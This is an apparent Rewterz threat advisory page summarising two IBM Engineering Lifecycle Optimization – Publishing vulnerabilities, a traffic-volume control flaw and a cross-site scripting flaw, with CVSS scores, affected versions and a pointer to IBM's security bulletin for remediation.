Rewterz Threat Advisory – CVE-2022-34169 – Apache Xalan Java XSLT library Vulnerability
July 20, 2022Rewterz Threat Alert – APT MustangPanda – Active IOCs
July 20, 2022Rewterz Threat Advisory – CVE-2022-34169 – Apache Xalan Java XSLT library Vulnerability
July 20, 2022Rewterz Threat Alert – APT MustangPanda – Active IOCs
July 20, 2022Severity
Medium
Analysis Summary
CVE-2021-39016 CVSS:4.3
IBM Engineering Lifecycle Optimization – Publishing 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the software to transmit more traffic than should be allowed for that actor.
CVE-2021-39015 CVSS:5.4
IBM Engineering Lifecycle Optimization – Publishing 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
Impact
- Security Bypass
- Cross-Site Scripting
Indicators Of Compromise
CVE
- CVE-2021-39016
- CVE-2021-39015
Affected Vendors
IBM
Affected Products
- IBM Engineering Lifecycle Optimization Publishing 6.0.6
- IBM Engineering Lifecycle Optimization Publishing 6.0.6.1
- IBM Engineering Lifecycle Optimization Publishing 7.0
- IBM Engineering Lifecycle Optimization Publishing 7.0.1
- IBM Engineering Lifecycle Optimization Publishing 7.0.2
Remediation
Refer to IBM Security Bulletin for patch, upgrade or suggested workaround information.
IBM Security Bulletin